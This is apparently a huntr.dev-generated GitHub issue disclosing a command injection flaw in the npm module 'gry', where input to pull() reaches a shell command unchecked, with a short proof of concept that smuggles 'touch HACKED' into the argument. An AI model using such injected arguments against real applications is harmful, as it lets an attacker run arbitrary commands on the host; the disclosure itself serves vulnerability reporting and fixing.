This issue has been generated on-behalf of Mik317 (https://huntr.dev/app/users/Mik317)
The issue occurs because a user input is formatted inside a command that will be executed without any check. The issue arises here: https://github.com/IonicaBizau/node-gry/blob/master/lib/index.js#L149

Steps To Reproduce:

```js
// poc.js
const Repo = require("gry");
var myRepo = new Repo(".");
myRepo.pull('test; touch HACKED; #', function(){console.log('Finished!')})
```

```bash
npm i gry    # Install affected module
node poc.js  # Run the PoC
```

HACKED has been created
Bug Bounty
We have opened up a bounty for this issue on our bug bounty platform. Want to solve this vulnerability and get rewarded 💰? Go to https://huntr.dev/
@IonicaBizau Resolved with #23?